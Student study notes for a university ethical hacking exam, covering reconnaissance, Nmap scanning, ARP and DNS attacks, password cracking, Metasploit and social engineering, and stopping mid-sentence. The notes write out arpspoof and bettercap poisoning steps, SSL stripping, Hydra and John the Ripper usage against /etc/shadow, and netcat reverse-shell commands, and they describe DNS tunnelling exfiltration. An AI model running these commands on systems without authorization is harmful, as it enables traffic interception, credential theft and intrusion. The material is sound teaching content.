CSCI 369 – Ethical Hacking Exam Contents Lecture 1-1: Introduction to Ethical Hacking ............................................................2 Lecture 1-2: Information Gathering ...........................................................................6 Lecture 2-1: TCP/IP Basics and Capturing Traffic .................................................10 Lecture 2-2: Scanning ..............................................................................................15 Lecture 3-1: ARP and ARP Poisoning ....................................................................19 Lecture 3-2: Protection against MITM, DNS Attacks and NAT .............................23 Lecture 4-1: Password Cracking and Password Security ........................................28 Lecture 4-2: Vulnerability Scanning & Target Exploitation (1) .............................32 Lecture 5-1: Target Exploitation (2) and Social Engineering .................................37 Lecture 5-2: Web Penetration ..................................................................................42 Lecture 6-1: Wireless Network Penetration and Privacy Tools ..............................45 Lecture 6-2: Privacy Tools (2) & Miscellaneous Topics.........................................49 Lecture 1-1: Introduction to Ethical Hacking Kinds of hackers White Hat (Ethical Hackers) • Under owner’s consent, they aim to identify the vulnerabilities in the current system. • They abide by a code of ethics which states that they cause no harm. Grey Hat • They hack with good intentions but at times without permission. Black Hat (Malicious Hackers) • They lack ethics, violate laws, and break into computer systems with malicious intent. • They might or might not be motivated by an agenda, but typically the information they gather is sold for a price. Cyberlaw was introduced due to: ➢ The difficulty of existing legal framework to keep up with technological advances in the cyberspace. ➢ The fact that more crimes take place within cyberspace. ➢ It touches on many elements such as: ➢ Contracts. ➢ Interactions between supplier and consumers. ➢ Policies on handling of data and accessing corporate systems. ➢ Complying with government regulations and programs. Controversies in Cyberlaw • FISA (Foreign Intelligence Surveillance Act of 1978) ➢ It is a United States federal law which permits the government to conduct electronic surveillance on “agents of foreign powers” suspected of espionage or terrorism. (If one of the parties involved in the communication is a US citizen, the law can be applied.) ➢ Wiretapping could be performed with or without a court order to acquire foreign intelligence. Categories of cybercrime law Identity theft • Where personal information is stolen and used, mainly for financial gain. • E.g., Opening of credit card/bank account, obtaining rental properties. Theft of service • Use of phone, Internet (Wi-Fi Network intrusion (Wi-Fi network) service), streaming movies without permission, it usually involves password cracking. • E.g., Sharing a Netflix account with friends can be considered as theft and can be prosecuted in certain states of US Transmitting of illegal materials • Distribution of pirated (without permission/license) software, games, movies, or child pornography. • E.g., Pirate Bay, Megaupload Cyberextortion/Ransomware attacks • Demanding money to prevent a threatened attack/leak of company’s confidential information • E.g., Fitness brand Garmin was a victim of a ransomware attack on 27 July 2020, their wearables, apps, websites, and call centers are offline for several days. • Famous celebrity hack September 2014, iCloud and Gmail accounts of celebrities are broken into, private photos and videos of celebrities are leaked to the public. Cryptojacking Dumpster Diving DoS/DDoS • Unauthorized use of someone else’s device to mine cryptocurrency. • Gathering of information from discarded/unattended materials • Overloading of system’s resources so that it cannot provide the required services to legitimate users. Cyberterrorism Cyberstalking/Cyberbullying Types of penetration testing Black-Box • Most closely resembles an outside attack. (External attack) • Pen tester conducts the attack from a remote location. • Pen tester is given extremely limited information of the target. Grey-Box • Pen tester will be given some limited knowledge on the target. • E.g., what OS is the target using etc. White-Box • Pen tester will be given full knowledge of the target. • It stimulates an “insider attack/internal test” Pen tester must obtain clear and unambiguous permission from the owners to perform a pen test. Preferably a written form of authorization rather than a verbal authorization: ➢ Systems to be evaluated ➢ Perceived risks ➢ Timeframe ➢ Actions to be performed when a serious problem is found ➢ Deliverables Risk Mitigation Plan (RMP) ➢ Purpose: It is to develop options and actions to enhance opportunities and reduce threats in an organization. ➢ Contents: It should clearly document all the actions that took place, including the results, interpretations, and recommendations. CIA triad ➢ Confidentiality: Keep information secret/private from those who are not authorized. ➢ Integrity: Keep information in a format that retains its original purpose and meaning. ➢ Availability: Keep information and resources available to those legitimate. Anti-CIA triad ➢ Improper disclosure/Disclosure: Accidental or malicious revealing of information. ➢ Unauthorized alteration/Destruction: Accidental or malicious modification of information. ➢ Disruption: Accidental or malicious disturbance of information or resources. Lecture 1-2: Information Gathering • Information gathering is a process of ethical hacking through which a pen tester locates information about a target, which will be useful for later steps of the attack. Passive Active Methods for intelligence gathering Gathering of information Tools such as without establishing contact theHarvester can between the attacker and be used to collect the target. emails about targeted domains. Gathering of information Tools such as which involves contact nmap can be used between the attacker and to run scans on the target. target machines to see what ports are open on them and thus what applications are running on them. Another example of passive intelligence gathering will be: Open Source Intelligence (OSINT) gathering: • By gathering information from publicly available sources such as via social media, phone number and email research, wireless network detection and packet analysis. • Due to the prevalence of online activities, this may be all that is required to give the attacker everything they need to successfully profile an organization or an individual. Domain Name System (DNS) • It is the phonebook of the Internet. • It resolves hostnames/domain names to IP addresses so that browsers can load the necessary Internet resources. Hierarchy placement From top to bottom How does DNS work? 1. User Web Browser - The user will type in an URL into their browser, but if the browser can’t find the IP address in its own cache memory, it will send a query to the Local DNS Server (ISP). 2. Local DNS Server/DNS Resolver – It will check its own cache memory to find an IP address to match the URL entered into the browser. If it can’t find it, it will send a query to the Root Server. 3. Root Server – The Local DNS Server queries the Root Servers to get a list of IP addresses for TLD Servers responsible for .com 4. Top-Level Domain (TLD) Server – The Local DNS Server queries the TLD Servers to get the IP address of the Authoritative DNS Server for the URL entered. 5. Authoritative DNS Server – The Local DNS Server queries the Authoritative DNS Server to get the IP address of the URL entered. 6. Back to user’s computer - The Local DNS Server will tell the user’s computer the IP address of the URL entered, and the computer can now retrieve the URL’s webpage. Gathering information about subdomains 1. https://searchdns.netcraft.com/ 2. https://pentest-tools.com/information-gathering/find-subdomains-ofdomain Gathering information about domains sharing the same IP address ➢ Reverse IP lookup - https://hackertarget.com/reverse-ip-lookup/ Gathering intelligence from websites • • • • • • People (personnel) Email addresses Physical addresses Job postings leaking information Product, project, and service information Electronic dumpster diving – finding websites that do not exist anymore (web.archive.org), on Kali Linux we can use “$sudo wget m <website name>” to download the website and view it offline to allow the attackers to find vulnerabilities. Intelligence Gathering Tools ➢ nslookup – Gathering information about Domain ➢ A tool for querying the DNS to obtain domain name, IP address mapping, or other DNS records. ➢ It can send a DNS query directly to any type of DNS Server (Root, TLD, Authoritative). ➢ By adding the -type option, one can specify the type of DNS record: o -type=A (IPv4) or AAAA (IPv6) – Stores IP address for a name. o -type= CNAME – This is an alias record for another record. o -type=MX – This identifies the mail server for that domain. o -type=NS – This identifies authoritative DNS servers for that DNS name. o -type=SOA – This provides the authoritative information about the domain. (e-mail address of the domain admin, the domain serial number, etc..) ➢ whois – Gathering information about Domain ➢ A protocol for querying about the owner of a domain name, IP network. ➢ Contains information about the owner, including email addresses, contact numbers, street addresses, etc.. ➢ Command syntax: $ whois <ip address/website url> ➢ traceroute – Gathering information about Network Topology ➢ A tool that can help determine network topology, showing the packet takes as it travels from the source to its destination. More importantly, it gives information about routers between the source and destination. ➢ theHarvester – Gathering information about email addresses, people ➢ A tool to collect email addresses, subdomains, employee names, etc.. ➢ Command syntax: $ theHarvester -d <domain name> -b <search engine> -l <number of entries> Lecture 2-1: TCP/IP Basics and Capturing Traffic TCP/IP Stack ➢ It stands for Transmission Control Protocol/Internet Protocol ➢ TCP/IP stack is specifically designed as a model to offer highly reliable and end-to-end byte stream over an unreliable internetwork. TCP: Connection-oriented protocol ➢ The sender does not send any data to the destination until the destination node acknowledges that it is listening to the sender. ➢ TCP/IP utilizes a three-way handshake to establish a connection between a device and a server: o The sender sends a SYN packet to the receiver. Three-way o The receiver sends SYN-ACK to the sender. handshake o The sender sends ACK to the receiver. . o Both the device and server must synchronize and acknowledge packets before communication begins, then they can negotiate, separate and transfer TCP socket connections. UDP: Connectionless protocol ➢ It does not need to verify whether the receiver is listening or ready to accept the packets unlike TCP which has handshaking dialogues. ➢ Since UDP does not have any handshaking dialogues, there is no guarantee of delivery, ordering and/or duplicate protection. ➢ Unreliable but fast – Used in applications in which queries must be fast and only consist of a single request such as DNS, SNMP and DHCP. IP address classes ➢ Class A address – network.host.host.host o The first 8 bits (first octet) is to identify the network, and the remaining 24 bits for the host into that network. o The 1st byte is reserved for the network address (network prefix) and the last 3 bytes are assigned to host computers. o Leading bits: 0 Range Binary: 00000000. 00000000. 00000000. 00000000 to 01111111. 11111111. 11111111. 11111111 Decimal: 0.0.0.0 to 127.255.255.255 o Number of addresses available for networks: 27 = 127 o Number of addresses available for hosts: 224 = 16,777,216 ➢ Class B address – network.network.host.host o The first 2 bytes are reserved for the network address and the last 2 bytes are assigned to host computers. o Leading bits: 10 Range Binary: 10000000. 00000000. 00000000. 00000000 to 10111111. 11111111. 11111111. 11111111 Decimal: 128.0.0.0 to 191.255.255.255 o Number of addresses available for networks: 26+8 = 16,384 o Number of addresses available for hosts: 216 = 64,536 ➢ Class C address – network.network.network.host o The first 3 bytes are reserved for the network address and the last one byte is assigned to host computers. o Leading bits: 110 Range Binary: 11000000. 00000000. 00000000. 00000000 to 11011111. 11111111. 11111111. 11111111 Decimal: 192.0.0.0 to 223.255.255.255 o Number of addresses available for networks: 25+8+8 = 2,097,152 o Number of addresses available for hosts: 28 = 256 ➢ Class D for multicast ➢ Class E for R&D and study Subnet mask - https://www.calculator.net/ip-subnet-calculator.html ➢ A bitmask that yields the network prefix (network address) when applied by a bitwise AND operation with any IP address in the network. ➢ It is a bitwise ➢ Example – The network prefix of an IP address 192.168.54.3 with a subnet mask 255.255.255.0 is 192.168.54 ➢ Subnet mask for: ▪ Class A – 255.0.0.0 ▪ Class B – 255.255.0.0 ▪ Class C – 255.255.255.0 IPv4 vs IPv6 No. of bits on IP Address Format Capable of address How to ping IPv4 32 Ipv6 128 Decimal (2 )4.3 billion Ping xxx.xxx.xxx.xxx Hexadecimal (2 )Infinite number ping6 32 128 Advantages of IPv6 over IPv4: ➢ ➢ ➢ ➢ IPv6 simplified the router’s task compared to IPv4. IPv6 is more compatible to mobile networks than IPv4. IPv6 allows for bigger payloads than what is allowed in IPv4. IPv6 is used by less than 1% of the networks, while IPv4 is still in use by the remaining 99%. CIDR Notation ➢ It is the compact method for representing an IP address and its associated network prefix. ➢ It is constructed from an IP address, a slash (‘/’) then a decimal number. The decimal number is the count of leading 1 bits in the subnet mask. ➢ Why is it needed? The classful network does not fully represent more finegrained network prefixes.: o Class A: /8 o Class B: /16 o Class C: /24 Capturing traffic using Wireshark • It is a GUI software that captures packets in real time and displays them in human-readable format. • Interfaces can be selected (such as eth0) and start capturing packets on that interface. • By default, Wireshark runs in promiscuous mode. The user can see all the other packets on the network instead of only packets addressed to the user’s network adapter. Wireshark Color Coding TCP traffic UDP traffic Errors Purple Light blue Black • The user can also see the full TCP conversation between the client and the server by following the TCP stream. • Wireshark can capture usernames and passwords entered to insecure websites. • Users can capture packets in Wireshark and save it to a “pcap” file, using a Python Scapy library to look for keywords such as “password” to look for the password. • Wireshark is also able to analyze connections based on secure application protocol such as SSL. Lecture 2-2: Scanning ➢ Attackers do scan to discover which machines in the target system are live, as they are unable to perform attacks if any of the machines are not available. ➢ During the scan, it gives the attacker more specific and precise information that can lead to exploitation. Scan types Ping sweep Port scanning Vulnerability scanning Description To find out live systems (Which IP addresses have a system that is live) Targets a specific IP address and identifies the ports that are open and closed. (A common technique to discover weak points in a network) To find weaknesses or problems in an environment and generate a report on its findings. Base Protocol ICMP scanning. Tools used ping – Targets one specific IP Every host that receives fping – Ping an ICMP multiple IP echo requests addresses. should respond, however, quite a few networks and hosts block ICMP echo request to prevent scanning. Nmap Port-Scanning Tools – Nmap It has many features such as: port scanning, version detection, OS detection, network traceroute, multiple ping scanning and scripting functionality. ➢ Command syntax: nmap <option> -v <target IP address> ➢ If the port is closed, the server will send RST (reset/tear down the connection) back to the client. Nmap scanning options: -sT (TCP Scan) ➢ Full Open Scan (Three-way handshake) ➢ Most reliable way in telling if the host’s port is open. ➢ It is “noisy” as it creates more traffic and involves multiple scanning attempts, which can be detected. -sS (SYN Scan) ➢ Half open scan (Default option for Nmap) ➢ Most frequently used scanning method. ➢ Less likely to trigger detection mechanism of the target(server). -sX (Xmas Scan) ➢ It sends a packet of PSH, FIN, URG flag to create confusion, if the server does not respond, it means the port is open or filtered. -sN (NULL Scan) ➢ It sends a packet with no flag, if the server does not respond, it means the port is open or filtered. -sF (FIN Scan) ➢ It sends a packet with FIN flag, if the server does not respond, it means the port is open or filtered. -sA (ACK Scan) ➢ It sends a packet with ACK flag, if the server does not respond, it means filtering is present. ➢ sU (UDP scan) – It is the only Nmap scanning method that identifies UDP ports. Nmap port specification: ➢ Default option – Most common 1000 ports will be scanned in a random order. ➢ -p (port range) – Scan only the defined ports (Can see which ports are open) ➢ -r – Do not randomize port numbers ➢ -sV – Attempts to determine the version of the service running on port (version number of the programs the target server is running) ➢ -O – Remote OS detection using TCP/IP stack fingerprinting ➢ -F – Only scan the 100 most common ports (fast) ➢ --top-ports N – Scan the most common N ports Nmap 6 states: ➢ open – The application is accepting TCP/UDP connection, result of a TCP or SYN scan. ➢ Closed – There is no application accepting TCP/UDP connection, result of a TCP, SYN, Xmas, NULL, FIN scan. ➢ Filtered – There is a packet filtering mechanism blocking the probe, result of an ACK scan. ➢ Unfiltered – The port is accessible, however Nmap is unable to determine if the port is open or not, result of an ACK scan. ➢ Open|filtered – The port is open or filtered, however Nmap is unable to determine if the port is open or filtered, result of a Xmas, NULL, FIN scan. ➢ Closed|filtered → Uncommon Lecture 3-1: ARP and ARP Poisoning ARP (Address Resolution Protocol) ➢ It is a network protocol used to discover the hardware (MAC) address of a host from an IP address. ➢ It is used on Ethernet LANs when host want to communicate with each other, and they should know each other’s MAC address. ➢ It is a simple request-reply protocol: o ARP request message are used to request for the MAC address o ARP reply message are used to send the requested MAC address ➢ ARP requests cannot be blocked by the host’s local firewall as ARP request are not routed on a network. 1 3 2 4 netdiscover ➢ It can be used to discover the connected clients to the current network interface. ➢ It shows information such as: IP address, MAC address and the hardware manufactures of the clients’ network card. ➢ It runs on 2 modes: o Passive mode – It sniffs arp requests on the network, but it does not generate any packet on the network. o Active mode – It finds nodes by sending arp requests. ARP Poisoning (based on MITM attack) ➢ Man-In-The-Middle attack is an attack where the attacker secretly relays and possibly modifies the communication between two parties, making them believe they are directly communicating with each other, the attacker will be in the “middle” to intercept the messages between the two parties. 1 2 3 4 5 6 ➢ Essentially the attacker wants Host A to think that he is the gateway and wants the real gateway to think that he is Host A. (“Impersonation”/Redirecting traffic) ➢ The attacker will be able to intercept every packet that goes through between Host A and the real gateway. ➢ The attacker will then be able to read/modify/drop these packets in the traffic, which will allow the attacker to conduct more powerful attacks. Arpspoof ➢ It is a tool to perform ARP Poisoning attack. 1. On target machine, run “arp-a” to check the MAC address of Kali Linux and the gateway. 2. On Kali, run “arpspoof -i <interface> -t <target IP> <gateway IP> 3. On Kali, run “arpspoof -i <interface> -t <gateway IP> <target IP> 4. On Kali, run “echo 1 > /proc/sys/net/ipv4/ip_forward”. This will enable IP forward to make packets go through the attacker’s device. Notice the gateway’s MAC address changed to Kali’s MAC address. ARP Poisoning is successful. Bettercap ➢ It is another method to perform ARP poisoning attack on Kali Linux. It features a GUI, more user friendly. 1. On Kali, run “set arp.spoof.fullduplex true”. This will let Kali attack both the targets and the gateway. 2. On Kali, run “set arp.spoof.targets <target IP>” and “arp.spoof on”. 3. Now, the target machine will think Kali is the gateway. 4. On Kali, run “net.sniff on”, Kali will now be able to capture sensitive information. If the target visits an unsecured website and keys in their login credentials, Bettercap will be able to capture that information. ➢ We can also write scripts to better execute the commands in Bettercap, the file extension will be “.cap” ➢ We can also perform SSL stripping, which downgrades a https website to http one, this will ensure https does not use TLS(SSL) encrypt normal HTTP requests and responses, thus allowing them to see everything the user says in an unencrypted form. Prevention against ARP Poisoning ➢ It is difficult to prevent ARP poisoning itself, as it exploits the insecure way that ARP works. (Why ARP Poisoning works) ➢ Prevention methods such as using static ARP tables are not feasible as it is does not scale well and have to be configured every time a new device is connected to the network. ➢ Detection methods: o Looking at the current ARP table (arp -a) – If the MAC address of the gateway changes, that means ARP Poisoning is underway. o Tools that monitor the ARP automatically – If there is anything suspicious, it will send the user a notification. o Wireshark – It warns the user by the message (“duplicate use of <IP address> detected”> Lecture 3-2: Protection against MITM, DNS Attacks and NAT End-to-end encryption can be an effective solution against eavesdropping using MITM attack: ➢ The end-to-end encryption successfully prevents the adversary from accessing the data in the middle. ➢ Even if the attacker managed to capture all the data transmitted between the server and the target, he is still unable to decrypt the data. ➢ The most popular and common end-to-end encryption will be TLS/SSL encryption, which solves HTTP’s problem as requests and responses are sent in plaintext. SSL/TLS Strip ➢ Since most websites uses TLS/SSL encryption (https), it makes it almost impossible to catch usernames and passwords. This is where SSL stripping comes in, the idea is to downgrade a https site to http. ➢ By downgrading https to http, the attacker prevents SSL certificate errors while he communicates with the client. How to prevent SSL Strip? o Users should do their due diligence in checking if the website they are visiting is a https site (check the SSL certificate on the website before they key in any sensitive information) o HSTS (HTTP Strict Transport Security) – A policy that enforces a web browser to only interact with websites using https. (The browser will not open a page unless the traffic from the websites is not https.) Recap: Domain Name System (DNS) ➢ Phone book of the Internet, it translates domain names to IP addresses so that web browsers can load Internet resources. (All Internet working applications require DNS to function) ➢ Uses a hierarchical naming schema, Root Server → Top-Level Domain Server → Authoritative Server ➢ Traditional firewalls leave port 53 open for DNS queries; however, this is difficult to protect against DDoS attacks such as amplification and reflection, therefore, it becomes a primary target to slow down or disable the target network. Normally if a DNS server does not know a requested translation, it will proceed to ask another DNS server, and this process continues recursively. To increase performance, a DNS server will store these translations in the cache for a certain amount of time, so that if it receives another requestion for the same translation, it will be able to reply without needing to ask other DNS servers. DNS Attacks 1. DNS Cache Poisoning (DNS Spoofing) • The attacker breaks into a local DNS server and modifies the DNS cache, so that it can return an incorrect IP address, redirecting traffic to another computer. • This means the DNS cache has been poisoned, since the cache gives the victim a false translation of hostnames. • Example – This attack can redirect users from a website to a one that the attacker owns. o Attacker spoofs the IP address/DNS entries for a target website on a given DNS server and replaces them with the IP address of a server under their control. o Usually, the server under the attacker’s control has been infected with malware. o This technique can also be used for phishing attacks, where a fake version of a genuine website is created to collect personal details (bank and credit card details) 2. DNS Spoofing with MITM • The MITM attacker captures a DNS response from the DNS server and replaces it with a modified one so that the DNS response will result in forcing the victim to visit the attacker’s server. ARP Poisoning Combination of DNS spoofing + MITM 3. Domain Hijacking • Attacker gains access to domain registration service (such as GoDaddy.com)’s server. (GoDaddy.com offers free whois privacy, which replaces the user’s information in the WHOIS with the information of a forwarding service) • It is difficult to attack those servers, but if it happens, there will be severe consequences. The attacker will change the IP address of a target website with the attacker’s IP of choice. All the other DNS servers will be updated with the new information. 4. DNS Tunnelling • An attacker’s malware in the victim’s machine wants to transfer data from it to the attacker’s server. (If the attacker uses File Transfer Protocol (FTP), it will be detected by the victim’s firewall) • The attacker acquires some domain such as attacker.com and runs local DNS server. • The malware in the victim’s machine makes DNS queries of the form <data>.attacker.com, where <data> is the data the attacker wants to exfiltrate. • If the query reaches the attacker’s DNS server, the DNS response will be sent to the victim’s machine. And since the DNS query is going through port 53, it is legitimate, enabling the attacker’s malware to bypass the firewall. 5. DNS flood attack (DDoS attack related) A form of DDoS attack. Attacker targets one or more DNS servers belonging to a given zone, attempting to impede resolution of resource records of that zone and its sub-zones. The objective of the attacks is to exhaust server-side assets with a flood of UDP requests, generated by scripts running on several compromised botnet machines. 6. DNS amplification attack • The attacker obtains a victim’s IP address. • The attacker identifies a website with large number of DNS records. • The attacker crafts fake DNS queries for the host with a large amount of DNS data with the victim’s IP (as a receiver) so that DNS responses with the large number of DNS records are returned to the victim. • The victim’s machine cannot handle the large amount of DNS responses → The machine is down. Lecture 4-1: Password Cracking and Password Security Password cracking ➢ It is an effective way to gain access to a system. ➢ Many institutions urge and educate their members to select strong passwords but not everyone follows the rule, always almost weak passwords are used. Password cracking methods: 1. Brute-force attack • Every possible combination of characters is attempted until the correct one is discovered. • Although this attack has potential to be successful eventually, many modern systems employ techniques such as “account lockouts” or “bad login counts” to prevent this attack. (Such as iPhone’s passcode, if too many failed login attempts, the phone will not allow the user to unlock for the phone for a certain amount of time) 2. Dictionary • Uses a list of words which can possibly be used as passwords. • Passwords cracking software usually has pre-loaded lists of words or allow users to load their own list (text file). • The words on the list can accelerate the cracking process and time. • These lists are all over the Internet and can be downloaded for free. 3. Hybrid method • This attack uses the dictionary attack as a basis but adopts some techniques of brute-force attacks as part of the process. (It can attempt some words in the dictionary but add numbers or special characters in a brute-force way) Password cracking tool 1. Hydra (Brute force) • It is an online brute-force password attack tool. • It makes use of numerous protocols including ftp, http, ssh, smtp, POP3, mysql and etc. • It supports multiple connection (i.e., parallel attacks) • Command syntax: hydra [options] <target IP> <protocol> o -t (The number of connects in parallel per target, default is 16) o -l (The login ID of the target) o -P (Load several passwords saved in the file) o -v (verbose) o -V (Shows every password being tried) 2. John-the-Ripper (Hybrid method in password cracking) • Unlike Hydra, it is an offline attack that finds the target’s password. • It usually uses a password list, but it is capable of performing a brute-force attack. • The attack consists of 2 steps: o Combine /etc/passwd(Stores a list of registered users in the system) and /etc/shadow(Stores the hashes of the passwords) – This process is called unshadowing. o Performing a dictionary attack against the unshadowered file using a word list to find a password. Rainbow table ➢ It is a table of reversed hashes used to crack password hashes. ➢ It greatly speeds up many types of password cracking attacks, often taking minutes to crack where other methods (such as dictionary, brute-force attack) may take much longer. ➢ It is a well-known pre-computed table for reversing hash. A table look-up is much faster than computing hash values one by one (This technique is called time/memory trade off). ➢ The basic idea is to search p such that h = H(p) using a huge number of precomputed (p, h)’s. Salt for password hashing ➢ It is a cryptographic salt is made up of random bits added to each password instance before its hashing. ➢ Salt creates unique passwords even in the instance of two users choosing the same passwords. ➢ It helps us mitigate hash table attacks by forcing attackers to re-compute them using salts for each other. ➢ Benefits of using “salt” for password hashing o Since salt creates unique passwords, it reduces the possibility of collision. o It enlarges the input space of the hash function, so the size of the rainbow table will be larger, making rainbow table attack impossible. Password entropy H ➢ It is the measure of strength of a password in bits. ➢ Formula: o H = log2NL (where L is the length of a string, password and N is the number of possible symbols) o It can be easily derived that L = H/log2N ➢ The minimum number of bits of entropy needed for a password depends on the threat model for the given application: o If online attacks are expected – 20-bit entropy is needed. o Important cryptographic keys to be secure for a long period of time – 96-bit entropy is needed. o Where does this estimation come from – n-bit entropy = Find a random (uniform) n-bit key Guidelines for strong passwords ➢ Should: o Minimum password length of 8 or more characters if permitted. o Passwords should include lowercase and uppercase alphabetic characters, numbers and symbols if permitted. o Generate passwords randomly where feasible. o Write down a password on a paper and store it (argumentative) o Password manager – To generate and retrieve complex passwords in an encrypted database. ➢ Avoid: o Same passwords across multiple accounts. o Repetition of characters, keyboard patterns, dictionary words, letter, or number sequences – qwerty123 o Public information that can be found online: birthdays, favorite sport teams, telephone numbers, usernames, relative or pet names, romantic links, or biographical information(addresses/birthplace). o Using default passwords supplied by the system vendor as lists of default passwords are widely available on the Internet. o Using dictionary words with numbers appended/dictionary words: john1234, mustang o Words with simple obfuscation: p@ssword, @dm1n Lecture 4-2: Vulnerability Scanning & Target Exploitation (1) Vulnerability Scanning ➢ Concept – A process of identifying and analyzing the critical security flaws in the target system. ➢ Purpose – It is an automated high-level test conducted that looks for potential security vulnerabilities on the target system. ➢ Benefits – It can provide valuable information about the security posture of an organization’s infrastructure, technical and management policies. Types of vulnerabilities: 1. Design • Weaknesses in the software specifications. (Worst type) • To fix these, the changes must be introduced into the security requirements. However, subsequent changes to the design and implementation can take considerable time and effort. 2. Implementation • Technical security glitches found in the code of the system. 3. Local • Attacker will require local access in order to exploit the vulnerability; this is used where the attacker already has the ability to execute code with limited permission and wishes to enhance his privileges to gain unrestricted access (privilege escalation) 4. Remote • Attacker has no prior access to the system but is able to trigger the execution of a piece of code over the network; this type allows an attacker to gain access to the system without having to deal with physical or local contacts. 5. Operational • Improper configuration and deployment of a system in a particular environment. Vulnerability taxonomy 1. Common Weaknesses Enumeration (CWE) • It is a list of software and hardware weaknesses. (It is organized following three categories – “Research Concepts”, “Development Concepts” and “Architectural Concepts”. • It has to do with the vulnerability – not the instance within a product or system. • It is supported by MITRE. • Purpose: i. To facilitate the effective use of tools that can identify, find and resolve bugs, vulnerabilities and exposures in computer software before the programs are publicly distributed or sold. • Benefits: i. Consumers – They can have assurance that the software they purchased has been reviewed for known types of security flaws. ii. Developers – They can describe their capabilities in terms of the standard CWEs. 2. Common Vulnerability and Exposures (CVE) • It is a list of publicly disclosed computer security flaws. Every security flaw is assigned to a CVE ID number. • It has to do with the specific instance within a product or system – not the underlying flaw. • It is supported by US-CERT, US Homeland Security Department, MITRE and development centers sponsored by the U.S. federal government. • Definitions given in CVE: i. Vulnerability: The state of being exposed to an attacker who can maliciously gain full access to a network or system. ii. Exposure: A mistake in the software code or configuration that provides an attacker with indirect access to a network or system. • Purpose of CVE: i. To standardize the way each known vulnerability and/or exposure is identified so that CVE database is maintained. ii. Standard IDs provides security administrators with quick access to technical information about a specific threat across multiple CVE-compatible information sources. 3. Open Web Application Security Project (OWASP) It is a standard awareness document for developers and web application security. It represents a broad agreement about the most critical security risk to web applications. Target Exploitation ➢ It is the next step after all the information gathering and scanning. ➢ This process will be simple if the attacker has obtained valuable information. ➢ Types of exploitation: i. Attack on client ▪ Getting the IP of the target will be tricky if the target is a personal computer if the target’s router assigns local (private) IPs to connected devices as the IP that is visible may be the router’s IP address. ▪ Client side attacks are more effective if reverse connection can be used. ii. Attack on servers ▪ Need to obtain IP address of the target server. ▪ Attacks become simpler if the target is on the same network. ▪ Tools such as: • nmap o To gather information about the target server’s OS ($ nmap -O <Target IP>) ( o To gather information about the target server’s version number of programs that target server is running ($nmap -sV <Target IP>) • netcat o To connect to the target machine on a specific port ($ nc <Target IP> <Port no.>) o We can perform many actions such as file transfer using netcat (requires shell) Metasploit Modules ➢ It is a piece of software that the Metasploit Framework uses to perform a task, such as exploiting or scanning a target. Module Types It is a program that takes advantage of a Exploit specific vulnerability and provides attackers access to the target system. Payload Typically, it carries a payload and delivers to the target. It is the actual code that executes on the target system after an exploit successfully executes. It can be a reverse shell payload or a bind shell payload. A backdoor. Auxiliary It does not require a payload, mainly used for information gathering such as a scanner. Basic commands of Metasploit msfconsole Run the Metasploit console in Kali Linux help Show instructions search <keyword> Look for possible exploits containing the keyword. use Use a specific exploit, payload or auxiliary. show options Display options for the current modules. set <option> <value> Configure <option> to have a value of <value> run Execute auxiliary modules. exploit Start exploit modules. back Go back to the original console prompt. clear Clear the screen. exit Exit from Metasploit. Lecture 5-1: Target Exploitation (2) and Social Engineering Payloads in Metasploit 3 types of payloads Payloads that are self-contained and standalone. (They do not depend on other programs to run) Small programs that establish and maintain communication between the attacker and victim. Payload components that are downloaded by the Stagers (usually big) Single(s) Stager(s) Stage(s) Shell ➢ It is a program that acts as a link between the user and the kernel. (Bash shell, cmd.exe, etc) ➢ Hacker’s POV – It is a command-line interface (CLI) that provides the hacker access to a remote target. BIND REVERSE Bind shell vs Reverse shell Bind shell Shell provided to the attacker when: Usually resulted from: How to create: Useful when: Reverse shell Attacker connects to the target. Server-side attack On the target machine: “$ nc -nvlp <Port number>” Victim connects to the attacker. Client-side attack On the attacker’s machine: “$nc -nvlp <Port Number>” On the attacker’s machine: “$nc <Target IP> <Port Number>” On the target machine: “$nc <Target IP> <Port Number>” Victim machine will listen to a specific port number while the attacker machine will connect to it. Attacker machine will listen to a specific port number while the victim machine will connect to it. Firewalls are present to block suspicious traffic as bind shells cannot be created. The target is behind a private network. Stealthy and effective attack. Client side exploitation ➢ Meterpreter shell from Metasploit ➢ Trojan (Similar to Assignment’s freesweep software) o They are programs which are supposed to do something which the users want but actually perform another, malicious act. o Capabilities ▪ Key-logger ▪ Adding the victim’s system to a botnet ▪ Giving the attacker full access to the victim’s machine (Backdoor) ▪ File transfer o Spreading – As trojans cannot be spread themselves, they rely on some social engineering tactics (email, website, CD, SMS). o Hiding – Difficult due to user-awareness and effective anti-virus software. Social Engineering ➢ It uses a broad range of malicious activities to psychologically manipulation to trick users into making security mistakes or giving away sensitive information. ➢ Importance – Since humans are the weakest link in cybersecurity, we are easily manipulated by others to do their bidding, making us vulnerable to social engineering information gathering and attacks. ➢ Attack process: 1. Information gathering ▪ It will be conducted via OSINT gathering via the Internet (or social networks), obtaining valuable information about the targeted individual or organization. ▪ Better insight about the target can be obtained by engaging the target physically involved in corporate events and parties or conferences. 2. Identifying vulnerable individuals ▪ Someone who is important enough who have access to some valuable resources but not so high profile that they are closely monitored. ▪ Targets of interest could include CIO (Chief Information Officer), CSO (Chief Security Officer), CFO (Chief Financial Officer), etc.. 3. Planning the attack ▪ Attack can be done physically or remotely. (Insider or remote attack) ▪ The plan often requires other social engineering skills such as charisma, friendly phone voice or physical appearance. 4. Execution ▪ The planned attack should be carried out with confidence and patience to observe and assess the result of target exploitation. ▪ Also depends on the level of complexity to perform the attack, other technical apparatuses such as fake websites and malware may need to be arranged. Social engineering attack vectors Phishing Concept Types Where fraudulent messages are sent to trick a victim into revealing sensitive information. Messages might appear as a trustworthy source. Spear Phishing Baiting Quid pro quo (something for something) The real-world The hacker offers a Trojan horse that uses service to his victim physical media and in exchange for relies on the curiosity sensitive information. or greed of the victim This could bait the to be executed. victim with irresistible offers such as cash rewards. Vishing (Voice Phishing) Example Smishing (SMS Phishing) Spear Phishing Directed to certain individuals or organizations, prior to the phishing attempt, extensive information gathering is required in order to increase their probability of success. Vishing – Impersonating as target’s company IT personnel. Smishing – Impersonating as M.O.H regarding COVID-19 concerns. An attacker may create a disk featuring a corporate logo, available from the target’s website, and label it “Promotion Result 2019 – Human Resources”. The attacker then leaves the disk somewhere in the target company, which could attract some employees’ attention. Attacker posing as IT employee at a company, contacting as many employees as possible at the company in exchange for alleged IT support. In return, employees have to disable their antivirus system on their machine, then a fake technician can install malware on the victims’ machine, posing as software updates. Protection against social engineering 1. Organization’s POV a. Principle of Least Privilege – An information security concept in which a user is given the minimum levels of access needed to perform their tasks. b. Establish an ID system – All employees, consultants and contractors are issued with IDs when hired, ensure IDs are returned with when their term with the organization has ended. c. Immediate action – Whenever suspicious activities and security breaches are 